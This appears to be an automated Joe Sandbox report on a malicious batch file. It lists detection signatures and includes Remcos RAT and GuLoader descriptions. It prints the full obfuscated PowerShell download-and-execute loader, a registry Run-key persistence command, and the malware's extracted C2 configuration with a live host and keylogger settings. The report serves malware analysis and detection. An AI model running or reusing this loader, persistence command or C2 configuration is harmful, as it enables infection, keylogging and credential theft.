Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SKM_0001810-01-2024-GL-3762.bat

Overview

General Information

Sample name:SKM_0001810-01-2024-GL-3762.bat
Analysis ID:1536952
MD5:94cfdc6035491e5b2be50fc7d7071ec1
SHA1:03a744cccaedb09ff1e1e4acf704a8d82b01d2ad
SHA256:9493ad437ea4b55629ee0a8d18141977c2632de42349a995730112727549f40e
Tags:batRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6756 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKM_0001810-01-2024-GL-3762.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1188 cmdline: powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t Endii,osofro nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser (Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser (Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser (Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser (Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava ');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS ,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno ');Indsigelser $Tui;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3488 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t Endii,osofro nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser (Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser (Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser (Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser (Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava ');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS ,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno ');Indsigelser $Tui;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5544 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 5088 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2812 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 6608 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6680 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6712 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6380 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "Nbuild", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JTPTLW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2041820420.00000000083A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2042394104.0000000008B40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.2020592068.000000000568C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_1188.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_3488.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc32e:$b2: ::FromBase64String(
                • 0xb3a8:$s1: -join
                • 0x4b54:$s4: +=
                • 0x4c16:$s4: +=
                • 0x8e3d:$s4: +=
                • 0xaf5a:$s4: +=
                • 0xb244:$s4: +=
                • 0xb38a:$s4: +=
                • 0x157d2:$s4: +=
                • 0x15852:$s4: +=
                • 0x15918:$s4: +=
                • 0x15998:$s4: +=
                • 0x15b6e:$s4: +=
                • 0x15bf2:$s4: +=
                • 0xbbda:$e4: Get-WmiObject
                • 0xbdc9:$e4: Get-Process
                • 0xbe21:$e4: Start-Process
                • 0x16461:$e4: Get-Process

                System Summary

                barindex
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2812, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5088, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", ProcessId: 2812, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 89.44.138.129, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5544, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)", ProcessId: 5088, ProcessName: cmd.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over 